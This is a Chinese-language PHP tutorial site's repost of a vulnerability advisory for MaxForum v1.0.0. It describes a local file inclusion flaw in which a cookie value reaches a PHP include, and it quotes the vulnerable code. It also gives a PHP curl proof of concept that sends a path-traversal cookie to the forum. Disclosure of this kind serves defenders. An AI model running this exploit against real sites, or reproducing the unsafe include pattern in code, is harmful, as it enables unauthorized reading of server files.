来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] +---------------------------------------+| MaxForum v1.0.0 Local File Inclusion |+---------------------------------------+作者 ahwak2000 z.u5[at]hotmail[dot]com下载地址 http://www.max4dev......
|
+---------------------------------------+
| MaxForum v1.0.0 Local File Inclusion | +---------------------------------------+ 作者 ahwak2000 z.u5[at]hotmail[dot]com 下载地址 http://www.max4dev.com/ 已测试版本 1.0 /MaxForum/includes/forums/warn_popup.php 该文件: line 100 if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){ line 101 $board_lang = escape_string($_COOKIE['max_lang']); line 102 } line 103 line 104 @include "../../language/$board_lang"; line 105 @include "../../language/$board_lang.php"; /MaxForum/libs/php/functions.php 文件中 function escape_string($string) { $string = addslashes($string); $string = htmlspecialchars($string); return $string; } www.2cto.com 测试证明 <? $url="http:// www.2cto.com /MaxForum/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php"); curl_setopt($ch, CURLOPT_COOKIE, "max_lang=../gpl.txt"); // <--- edit $buffer = curl_exec($ch); ?> #end |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
